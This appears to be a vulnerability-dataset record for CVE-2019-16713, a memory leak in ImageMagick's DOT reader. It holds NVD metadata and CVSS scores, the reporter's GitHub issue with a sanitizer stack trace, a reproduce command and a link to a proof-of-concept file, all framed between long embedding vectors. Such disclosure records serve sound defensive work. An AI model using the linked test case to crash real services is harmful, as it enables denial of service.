0.02228936180472374, 0.0015058093704283237, -0.0013620859244838357, -0.004200860857963562, 0.017870565876364708, -0.011016926728188992, 0.007139208726584911, 0.00850693043321371, -0.0016091400757431984, 0.00023167202016338706, 0.006436560302972794, -0.006586859468370676, 0.02359696291387081, 0.01472179964184761, 0.016623083502054214, 0.005763971712440252, 0.0185769721865654, -0.011174740269780159, -0.02078636921942234, -0.007184298243373632, 0.026753244921565056, -0.0066582513973116875, -0.013113599270582199, 0.018637092784047127, 0.0020234021358191967, 0.005500948056578636, 0.05314577370882034, 0.01085911225527525, -0.021447686478495598, -0.006500437390059233, -0.004321100190281868, 0.008108638226985931, -0.030585873872041702, 0.032765209674835205, 0.01085911225527525, 0.01734451949596405, -0.0018928296631202102, -0.007398474495857954, 0.02242463082075119, 0.01964409649372101, -0.0002033735072473064, 0.006256201304495335, 0.03565095365047455, -0.009739384055137634, -0.022665109485387802, -0.017404640093445778, 0.0004450263222679496, -0.020861519500613213, 0.010753902606666088, 0.0025231465697288513, 0.0033742154482752085, -0.027189113199710846, 0.0024630269035696983, 0.006522982381284237, -0.009897197596728802, 0.0036917224060744047, 0.004347402136772871, -0.0070678167976439, -0.017930686473846436, -0.024784326553344727, -0.003409911412745714, -0.011745876632630825, 0.0015001732390373945, -0.0015142636839300394, -0.019734276458621025, 0.013256383128464222, -0.027249231934547424, -0.004403764382004738, -0.0023784837685525417, -0.0044977013021707535, -0.01784050650894642, -0.0192533191293478, -0.017554938793182373, -0.016848532482981682, -0.011971325613558292, -0.016968771815299988, -0.0024348460137844086, 0.004711877554655075, -0.0015508991200476885, -0.0034286989830434322, -0.0034888186492025852, 0.004242192953824997, -0.01871224120259285, 0.01016022078692913, 0.02502480521798134, 0.010881656780838966, -0.004354917444288731, 0.01614212617278099, -0.013459287583827972, 0.018637092784047127, 0.008401721715927124, 0.004926053807139397, -0.01154297310858965, -0.0055685825645923615, 0.007905734702944756, 0.005159017629921436, 0.006455347873270512, -0.009348605759441853, -0.008499415591359138, -0.0254005528986454, -0.0004997446085326374, -0.005252954550087452, 0.006169779226183891, -0.0040129865519702435, -0.0005359103088267148, -0.0006622555665671825, 0.014158178120851517, -0.0096266595646739, 0.007443564478307962, 0.01085911225527525, -0.0070828464813530445, 0.01251240260899067, -0.01974930614233017, 0.03081132099032402, -0.007417262066155672, 0.01821625418961048, 0.013812489807605743, -0.023146066814661026, -0.041121840476989746, -0.002273274352774024, 0.02562600187957287, -0.00046968477545306087, 0.01224937941879034, -0.002928954316303134, 0.022875526919960976, -0.0001398486492689699, 0.002528782933950424, -0.01490215864032507, 0.01398533396422863, 0.02275528758764267, 0.005068838130682707, 0.009776958264410496, -0.02927827090024948, -0.0032746423967182636, 0.01701386086642742, -0.011948781087994576, 0.009559025056660175, 0.009754413738846779, -0.009235881268978119, -0.005275499541312456, 0.016232306137681007, -0.00347566744312644, 0.01445126160979271, -0.017434699460864067, -0.010866627097129822, -0.020395591855049133, 0.017735296860337257, 0.021297385916113853, 0.019027870148420334, 0.01261761225759983, -0.005226652137935162, -0.008131182752549648, -0.0008111456409096718, 0.008461841382086277, -0.000929036526940763, -0.010272945277392864, -0.012301984243094921, -0.0011704544303938746, 0.0035677256528288126, -0.009446300566196442, 0.05660265311598778, 0.0020478256046772003, -0.0021830948535352945, -0.002113581635057926, -0.011039471253752708, -0.004339887294918299, 0.021943673491477966, 0.008349116891622543, -0.014857068657875061, -0.001797953387722373, -0.01007755659520626, -0.001549959764815867, 0.013158689253032207, -0.025220194831490517, -0.0065981317311525345, -0.01022785622626543, -0.009649204090237617, -0.0012869363417848945, -0.022078942507505417, -0.011760907247662544, 0.00481332978233695, -0.012317013926804066, 0.011009410955011845, 0.007860644720494747, 0.0036222089547663927, -0.006789762992411852, 0.01393272913992405, 0.0031938564497977495, -0.004200860857963562, -0.0472540482878685, 0.010746387764811516, -0.014030423946678638, 0.010039981454610825, 0.012106594629585743, 0.02195870317518711, 0.026482706889510155, -0.00199334230273962, 0.02021523378789425, 0.0015001732390373945, -0.012271923944354057, 0.01844170317053795, -0.010130161419510841, -0.034238141030073166, -0.0025325403548777103, 0.004080621525645256, -0.009679264388978481, 0.001920071430504322, 0.0010417609009891748, 0.01971924677491188, -0.0035113634075969458, -0.010295490734279156, 0.007725375238806009, -0.010325550101697445, 0.005350648891180754, -0.009333576075732708, 0.004565336275845766, -0.006590616889297962, 0.007755435071885586, -0.013572011142969131, 0.005136472638696432, -0.01191120594739914, -0.011663212440907955, -0.000824296788778156, 0.025145044550299644, -0.002459269482642412, 0.007015211973339319, 0.030600903555750847, 0.014594045467674732, -0.009559025056660175, 0.004046804271638393, 0.0169387124478817, -0.010731358081102371, 0.0133841373026371, -0.003114949446171522, -0.004749452695250511, -0.004779512528330088, 0.03646256774663925, 0.00777798006311059, 0.001346116536296904, 0.003967897035181522, -0.004854661878198385, -0.017299430444836617, 0.008439295925199986, 0.0009788230527192354, -0.011490368284285069, -0.022845467552542686, -0.016893621534109116, -0.004771997220814228, 0.0025964174419641495, 0.007958338595926762, -0.0015546566573902965, 0.0002820457157213241, -0.02302582748234272, -0.01430096197873354, -0.004294797778129578, -0.0018731029704213142, -0.00800342857837677, 0.010017436929047108, 0.0096266595646739, -0.006338865961879492, -0.0039040199480950832, 0.010731358081102371, -0.026557857170701027, -0.004565336275845766, -0.007127936463803053, -0.006823580712080002, -0.017554938793182373, -0.026918575167655945, -0.02075630985200405, 0.00008125546446535736, -0.00244799698702991, 0.01671326346695423, -0.007702830247581005, 0.009468845091760159, -0.0013592677423730493, -0.00813869759440422, -0.005944330710917711, -0.002756110392510891, -0.00048753281589597464, 0.0073082949966192245, -0.009596599265933037, -0.003975411877036095, 0.0074097472243011, 0.0069776372984051704, -0.002810593694448471, -0.008416751399636269, 0.008905223570764065, 0.014781919308006763, -0.0022582444362342358, 0.0018007714534178376, 0.0034963334910571575, 0.004358674865216017, -0.009739384055137634, 0.015616079792380333, 0.01524033211171627, 0.03381730616092682, -0.0068573979660868645, 0.006786005571484566, 0.0026809608098119497, -0.007620166055858135, 0.0051815626211464405, 0.048666857182979584, -0.009356120601296425, -0.00035813465365208685, -0.01054348424077034, -0.00042976156692020595, -0.02409294992685318, 0.001462598447687924, -0.012038960121572018, -0.016623083502054214, 0.014098058454692364, 0.005283014383167028, 0.03673310577869415, -0.008980372920632362, 0.0008299330365844071, -0.007481139153242111, -0.00632383581250906, 0.01398533396422863, -0.016247335821390152, 0.004332372453063726, -0.004933569114655256, -0.01490215864032507, -0.01285057608038187, 0.03736436367034912, 0.004591638222336769, 0.01096432190388441, -0.0015462023438885808, 0.014361081644892693, 0.01827637478709221, -0.0006101205362938344, 0.0025832662358880043, 0.00850693043321371, -0.008664744906127453, 0.00476072495803237, 0.03081132099032402, 0.009431270882487297, -0.0077479202300310135, 0.006763461045920849, 0.0017199856229126453, 0.02703881449997425, -0.0010023072827607393, -0.008702320046722889, -0.03529023751616478, -0.0016457755118608475, -0.011715817265212536, 0.0013705402379855514, -0.013624615967273712, -0.007364657241851091, 0.022875526919960976, 0.015991827473044395, 0.0024630269035696983, -0.016127096489071846, 0.013053479604423046, -0.020696191117167473, -0.018667152151465416, -0.0012033324455842376, -0.00011695150897139683, -0.003002225188538432, 0.013308987952768803, 0.007473624311387539, -0.017224280163645744, -0.023251274600625038, -0.012084050104022026, 0.01321880891919136 ]
1,786
CVE-2019-16713
2019-09-23T12:15:10.783000
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1558" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:*:*:*:*:*:*:*", "matchCriteriaId": "98A09968-FA06-4217-82A0-802531283B4F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1558
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> ``` ==104405==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13504 byte(s) in 1 object(s) allocated from: #0 0x7ff36e5f7602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x43f2a5 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x412eef in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x413262 in AcquireImage MagickCore/image.c:172 #4 0x580742 in ReadDOTImage coders/dot.c:129 #5 0x806aa6 in ReadImage MagickCore/constitute.c:547 #6 0x4b69f6 in ReadStream MagickCore/stream.c:1043 #7 0x805b31 in PingImage MagickCore/constitute.c:269 #8 0x8060fd in PingImages MagickCore/constitute.c:370 #9 0xc1b2a7 in IdentifyImageCommand MagickWand/identify.c:319 #10 0xc9fbca in MagickCommandGenesis MagickWand/mogrify.c:185 #11 0x40e9e1 in MagickMain utilities/magick.c:149 #12 0x40ebc2 in main utilities/magick.c:180 #13 0x7ff36a8e782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) ``` ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: ``` /usr/local/bin/magick identify $inupt ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: 7.0.8-43 - Environment (Operating system, version and so on): Linux ubuntu 4.15.0-47-generic #50~16.04.1-Ubuntu SMP Fri Mar 15 16:06:21 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux - Additional information: ./configure CC="gcc" CXX="g++" CFLAGS="-g -fsanitize=address" -disable-shared testcase: https://github.com/butterflyhack/pocs/blob/master/memory-leaks-identify-PingImage.zip report by ADlab of Venustech <!-- Thanks for reporting the issue to ImageMagick! -->
memory leaks in PingImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1558/comments
2
2019-04-28T04:48:48
2019-09-24T07:16:29Z
https://github.com/ImageMagick/ImageMagick/issues/1558
438,013,444
1,558
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : memory leaks in PingImage Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> ``` ==104405==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13504 byte(s) in 1 object(s) allocated from: #0 0x7ff36e5f7602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x43f2a5 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x412eef in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x413262 in AcquireImage MagickCore/image.c:172 #4 0x580742 in ReadDOTImage coders/dot.c:129 #5 0x806aa6 in ReadImage MagickCore/constitute.c:547 #6 0x4b69f6 in ReadStream MagickCore/stream.c:1043 #7 0x805b31 in PingImage MagickCore/constitute.c:269 #8 0x8060fd in PingImages MagickCore/constitute.c:370 #9 0xc1b2a7 in IdentifyImageCommand MagickWand/identify.c:319 #10 0xc9fbca in MagickCommandGenesis MagickWand/mogrify.c:185 #11 0x40e9e1 in MagickMain utilities/magick.c:149 #12 0x40ebc2 in main utilities/magick.c:180 #13 0x7ff36a8e782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) ``` ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: ``` /usr/local/bin/magick identify $inupt ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: 7.0.8-43 - Environment (Operating system, version and so on): Linux ubuntu 4.15.0-47-generic #50~16.04.1-Ubuntu SMP Fri Mar 15 16:06:21 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux - Additional information: ./configure CC="gcc" CXX="g++" CFLAGS="-g -fsanitize=address" -disable-shared testcase: https://github.com/butterflyhack/pocs/blob/master/memory-leaks-identify-PingImage.zip report by ADlab of Venustech <!-- Thanks for reporting the issue to ImageMagick! --> --- end body ---
2,468
[ -0.03595289587974548, 0.002896367572247982, -0.0032283191103488207, 0.004723924677819014, 0.02445497363805771, 0.03563188761472702, 0.0028069959953427315, 0.038141585886478424, -0.02255810797214508, 0.024104783311486244, 0.0003992081037722528, -0.008864197880029678, 0.005581161938607693, 0.00729928445070982, -0.011600062251091003, -0.03029148280620575, -0.022952072322368622, 0.003717126790434122, -0.0297224223613739, -0.0496395118534565, 0.013212397694587708, -0.021084388718008995, -0.048851583153009415, 0.0100023178383708, -0.0068907286040484905, 0.00922168418765068, 0.013307240791618824, 0.006219530012458563, -0.010294143110513687, 0.017611665651202202, 0.04902667552232742, 0.028292477130889893, 0.002037306549027562, 0.027650462463498116, 0.016531912609934807, -0.019260480999946594, 0.030349846929311752, 0.06992138177156448, 0.011308236047625542, -0.0002084956067847088, -0.02784014865756035, -0.0606413297355175, -0.012533903121948242, 0.0006666387780569494, -0.01721770130097866, -0.02770882658660412, 0.004570716060698032, -0.04094311222434044, -0.0351066030561924, 0.008915267884731293, 0.03218834847211838, -0.02263106405735016, -0.014292151667177677, -0.028277887031435966, 0.015437566675245762, 0.0034362447913736105, 0.03592371195554733, 0.03414357826113701, 0.013941961340606213, 0.0036642334889620543, 0.0008431019959971309, 0.07832594960927963, 0.007153371348977089, 0.027460776269435883, 0.012818433344364166, -0.002237936481833458, -0.012628746218979359, 0.01340208388864994, 0.008309729397296906, 0.001993532758206129, -0.013445857912302017, -0.01383252628147602, 0.03204243630170822, 0.01953771337866783, 0.0363030880689621, -0.0038703351747244596, 0.05967830494046211, 0.012183712795376778, -0.030495760962367058, 0.004993862938135862, -0.027095993980765343, 0.059298932552337646, -0.009447849355638027, 0.039629895240068436, 0.04818038269877434, 0.01609417423605919, -0.038900334388017654, -0.06104988604784012, 0.012015913613140583, -0.01820990815758705, 0.029022041708230972, 0.009666718542575836, 0.017961855977773666, -0.017538709565997124, 0.002285358030349016, -0.005548331420868635, -0.029649466276168823, -0.02013595588505268, -0.047392453998327255, 0.0029255500994622707, -0.032334260642528534, -0.03933807089924812, -0.00981992669403553, 0.031108593568205833, 0.01006797794252634, 0.0032337908633053303, -0.005624935496598482, -0.0448535718023777, 0.003075110726058483, 0.13015414774417877, 0.018633054569363594, -0.0006201291107572615, -0.028350843116641045, 0.0023583145812153816, 0.007255510427057743, 0.018735194578766823, 0.02445497363805771, 0.0021759236697107553, -0.058073267340660095, -0.02770882658660412, -0.023229306563735008, -0.04415319114923477, -0.012088869698345661, -0.004293481819331646, -0.02195986546576023, 0.03367665782570839, 0.002757750451564789, -0.014321334660053253, -0.02487812004983425, 0.0007382272160612047, 0.002983915386721492, -0.039892539381980896, 0.017830535769462585, -0.026351839303970337, 0.01273818127810955, -0.03688673675060272, -0.0030422804411500692, 0.033122189342975616, 0.0023947926238179207, 0.0018567395163699985, -0.058540187776088715, -0.04079720005393028, 0.02451333776116371, -0.015919078141450882, -0.01729065738618374, -0.012183712795376778, -0.023039620369672775, 0.0049537369050085545, 0.0007988722063601017, 0.006810476537793875, -0.022674838081002235, -0.007470731623470783, 0.02023809589445591, 0.005121536552906036, 0.021215710788965225, -0.019654445350170135, 0.021551309153437614, 0.04263569787144661, -0.016998833045363426, -0.0212303027510643, -0.03691592067480087, -0.02328767068684101, 0.02565145678818226, -0.000853589444886893, -0.011556288227438927, -0.010746472515165806, 0.0038484481628984213, 0.014759072102606297, -0.002325484063476324, 0.020821746438741684, 0.02286452427506447, -0.0011144084855914116, 0.007113245315849781, -0.00752180116251111, -0.05010643228888512, 0.014080578461289406, -0.003024041187018156, -0.0170134250074625, -0.011614653281867504, -0.021186528727412224, 0.03099186345934868, 0.02414855733513832, -0.009878291748464108, 0.009061180055141449, 0.02193068340420723, -0.024469563737511635, 0.01724688522517681, -0.02120111882686615, 0.0038156178779900074, -0.004760402720421553, -0.03224671259522438, -0.002334603574126959, 0.008105452172458172, -0.03706183284521103, 0.035485975444316864, 0.00647852523252368, -0.02703762799501419, -0.006872489582747221, 0.013927370309829712, -0.051769837737083435, 0.005479022860527039, -0.02664366364479065, -0.00901011098176241, -0.0025552967563271523, -0.014036804437637329, 0.018224500119686127, -0.031400419771671295, 0.016400590538978577, 0.029255501925945282, -0.05317059904336929, -0.022747794166207314, -0.012643338181078434, 0.021449171006679535, 0.015116558410227299, -0.035719435662031174, 0.006795885507017374, -0.009943952783942223, 0.022310055792331696, -0.004034487064927816, -0.0020154195372015238, 0.02687712386250496, -0.003231966868042946, 0.003591276938095689, 0.003983417525887489, -0.05191574990749359, -0.035048238933086395, 0.001535731484182179, 0.003283036407083273, -0.03892951458692551, -0.0016497258329764009, 0.03294709324836731, -0.04243142157793045, 0.03496069088578224, 0.014146238565444946, -0.0027942287269979715, -0.005194493103772402, -0.025753596797585487, -0.015452157706022263, -0.008076269179582596, 0.022543516010046005, 0.045466404408216476, 0.026964671909809113, -0.006533242296427488, -0.0007313875248655677, 0.008419164456427097, 0.00366970500908792, -0.0163859985768795, -0.019435575231909752, -0.014780959114432335, 0.03102104552090168, 0.025593092665076256, -0.025534726679325104, -0.00898822396993637, -0.02826329506933689, 0.007197145372629166, -0.015671027824282646, 0.026862533763051033, 0.005650470498949289, -0.02468843385577202, -0.025870326906442642, 0.011271758005023003, 0.020894702523946762, -0.014124352484941483, 0.012803842313587666, 0.010257665067911148, -0.019435575231909752, -0.016502728685736656, 0.03294709324836731, 0.010367099195718765, -0.009382188320159912, 0.020486146211624146, -0.015174923464655876, 0.010578672401607037, -0.03177979215979576, -0.045408040285110474, 0.004650968126952648, 0.000027586625947151333, -0.012059686705470085, -0.009659422561526299, -0.01651732064783573, 0.00229812553152442, 0.005139776039868593, -0.05016479641199112, 0.031196141615509987, 0.00884231086820364, -0.0055702184326946735, 0.013475039973855019, -0.013941961340606213, -0.033122189342975616, 0.01565643586218357, -0.013321831822395325, 0.013051893562078476, -0.015685617923736572, 0.0034891380928456783, 0.032129984349012375, -0.00221057771705091, -0.013445857912302017, -0.0016825561178848147, -0.04820956662297249, 0.00563223147764802, -0.041351668536663055, -0.017932673916220665, -0.016794554889202118, 0.014401585794985294, -0.020150547847151756, 0.013278057798743248, -0.022908298298716545, 0.006569720804691315, 0.010542194359004498, -0.017830535769462585, 0.019420983269810677, -0.03758711740374565, 0.01504360232502222, -0.026789577677845955, -0.02687712386250496, 0.014635046944022179, 0.016765372827649117, -0.026264291256666183, 0.003104293253272772, 0.003366936231032014, -0.012015913613140583, 0.0000842418012325652, -0.028380025178194046, 0.021916091442108154, 0.01695505902171135, 0.01216182578355074, -0.0011791572906076908, 0.06385140866041183, -0.049085043370723724, 0.013066484592854977, 0.005103297531604767, -0.03776221349835396, -0.019318845123052597, -0.030904315412044525, 0.034814778715372086, -0.0534040592610836, -0.023200124502182007, 0.04502866789698601, 0.02565145678818226, 0.027081402018666267, -0.038375046104192734, -0.00819299928843975, -0.013876300305128098, -0.056643322110176086, 0.03350156173110008, -0.01625467836856842, 0.002164980163797736, -0.008499416522681713, 0.006259656045585871, -0.00441385991871357, 0.000981263117864728, 0.03423112630844116, -0.011220688931643963, 0.01888110674917698, 0.018764376640319824, 0.027256498113274574, -0.008112747222185135, 0.01448183786123991, -0.0008946274174377322, -0.018107770010828972, 0.009447849355638027, -0.05109863728284836, -0.00016426581714767963, 0.0037025355268269777, 0.014131647534668446, 0.022835342213511467, -0.008047087118029594, -0.030408212915062904, -0.03125450760126114, 0.030174752697348595, -0.0024677489418536425, 0.039600715041160583, -0.0363614521920681, 0.027548322454094887, -0.01672159880399704, -0.015948262065649033, 0.027577506378293037, 0.02242678590118885, -0.016736190766096115, 0.009987725876271725, -0.0013861709740012884, 0.01661945879459381, 0.03393930196762085, -0.049347683787345886, -0.005179902072995901, 0.021390805020928383, 0.002533409744501114, 0.03131287172436714, 0.017028015106916428, -0.028219521045684814, -0.05547602102160454, 0.021522127091884613, -0.02760668843984604, -0.019625261425971985, -0.02531585842370987, 0.06461015343666077, 0.01562725380063057, -0.029211727902293205, 0.024994850158691406, -0.06566073000431061, -0.009703196585178375, -0.02352113090455532, 0.01724688522517681, -0.0070585282519459724, -0.006857898086309433, 0.030875133350491524, 0.026424795389175415, -0.040592920035123825, 0.030962681397795677, -0.03201325237751007, 0.024469563737511635, -0.0254471804946661, -0.0473049059510231, 0.009411371313035488, 0.025753596797585487, 0.033589109778404236, -0.009323823265731335, -0.011074775829911232, -0.00041881512152031064, 0.021799361333251, -0.00925816223025322, -0.00022126297699287534, -0.0002758662449195981, 0.022470559924840927, -0.026235109195113182, 0.011249870993196964, 0.034085214138031006, 0.017334431409835815, 0.020413190126419067, -0.03253853693604469, -0.047188177704811096, -0.01791808381676674, 0.006989219691604376, 0.013759570196270943, -0.0022124017123132944, -0.041585128754377365, -0.03370584174990654, -0.0059568872675299644, -0.008295138366520405, -0.029912108555436134, 0.004650968126952648, 0.030729221180081367, 0.005183549597859383, -0.024994850158691406, -0.0031243562698364258, -0.03951316699385643, -0.009666718542575836, -0.010761063545942307, -0.0025790075305849314, -0.03855014219880104, -0.012512016110122204, 0.016940467059612274, 0.017742987722158432, -0.03446458652615547, 0.010607855394482613, 0.0002617309510242194, -0.056876782327890396, -0.0230542104691267, 0.003906813450157642, 0.0031845453195273876, -0.0010624270653352141, 0.015773165971040726, -0.03922134265303612, -0.019960861653089523, -0.00582921365275979, 0.022543516010046005, 0.00043705423013307154, 0.0017263299087062478, 0.022718612104654312, -0.014656933955848217, 0.04164349287748337, 0.02481975592672825, 0.011906478554010391, -0.0013433090643957257, -0.015977444127202034, 0.01904161088168621, -0.016502728685736656, -0.007529096677899361, 0.03320973739027977, -0.05039825662970543, 0.007113245315849781, -0.028307069092988968, -0.04514539986848831, 0.0038156178779900074, 0.031633879989385605, -0.0012648809934034944, 0.03758711740374565, -0.019129158928990364, -0.01527706254273653, 0.01551052276045084, 0.014401585794985294, 0.030116386711597443, -0.0157877579331398, -0.023477358743548393, -0.01984413154423237, -0.0013478688197210431, -0.04899749532341957, -0.04841384291648865, 0.026162151247262955, 0.004917258862406015, 0.010513012297451496, -0.04167267680168152, 0.023039620369672775, 0.011155027896165848, 0.033559925854206085, -0.04027191177010536, -0.01292057242244482, 0.00626330403611064, -0.01282572839409113, -0.024965668097138405, 0.009433258324861526, -0.056351494044065475, 0.004176751710474491, -0.03998008742928505, 0.019099976867437363, -0.013504222966730595, 0.020690424367785454, -0.014241082593798637, 0.021770179271697998, 0.004873485304415226, -0.014219195581972599, -0.00798142608255148, -0.004632729105651379, 0.025272084400057793, -0.00608091289177537, 0.014868507161736488, 0.024659251794219017, 0.024338243529200554, 0.0013296296820044518, -0.04272324591875076, 0.03434785455465317, -0.01131553202867508, -0.006770350504666567, 0.03805403783917427, -0.0025790075305849314, 0.03443540260195732, -0.016006626188755035, 0.024965668097138405, -0.02268943004310131, 0.0014345045201480389, -0.005271097179502249, 0.032830365002155304, 0.011184210889041424, 0.014788255095481873, -0.011840817518532276, 0.009761561639606953, -0.005676005035638809, 0.01006797794252634, 0.004184047691524029, -0.018720602616667747, -0.001314126537181437, -0.02156590111553669, -0.00416216067969799, 0.008623442612588406, -0.00841186847537756, 0.005716131068766117, 0.011220688931643963, 0.010243073105812073, 0.02338981069624424, 0.016050400212407112, -0.014372403733432293, 0.009768856689333916, 0.012395286001265049, 0.01551052276045084, -0.02338981069624424, -0.02677498571574688, 0.02020891197025776, 0.014576681889593601, -0.051273733377456665, -0.024542521685361862, 0.03122532367706299, 0.009083067066967487, -0.007806330919265747, -0.036215540021657944, -0.008265956304967403, -0.008244069293141365, 0.012293146923184395, -0.010877793654799461, -0.006161164958029985, -0.023535722866654396, 0.02638102136552334, -0.013270762749016285, 0.009593761526048183, 0.02534504048526287, -0.00011633120448095724, -0.03930889070034027, 0.012781955301761627, -0.0009985902579501271, -0.021624267101287842, -0.018472550436854362, 0.01504360232502222, 0.0026702028699219227, -0.004971976391971111, 0.001938815345056355, 0.012030504643917084, -0.020515330135822296, 0.008207591250538826, 0.0009520805324427783, 0.03974662721157074, 0.012132643721997738, -0.0064675817266106606, 0.007835513912141323, 0.008492120541632175, -0.04167267680168152, -0.02680416777729988, -0.008149226196110249, 0.01483202911913395, -0.006846954580396414, 0.01575857400894165, 0.010914271697402, 0.025286676362156868, 0.013263466767966747, 0.04774264618754387, 0.013183214701712132, 0.01864764653146267, -0.003443540306761861, 0.014401585794985294, -0.001918752328492701, -0.01768462173640728, -0.010330621153116226, 0.009958543814718723, -0.04578741267323494, 0.02461547777056694, 0.016210904344916344, -0.008937154896557331, 0.0108996806666255, -0.025126172229647636, -0.007281044963747263, -0.01483202911913395, -0.020281869918107986, -0.000322603911627084, 0.012978937476873398, 0.02856971137225628, -0.01562725380063057, -0.02893449366092682, 0.04362790659070015, 0.01765543967485428, -0.014080578461289406, -0.005807326640933752, -0.035777799785137177, -0.023973461240530014, -0.002194162691012025, -0.016809146851301193, -0.005125184543430805, -0.027183542028069496, -0.011125845834612846, -0.011548992246389389, 0.019450167194008827, -0.004902667831629515, 0.025169946253299713, -0.023141758516430855, 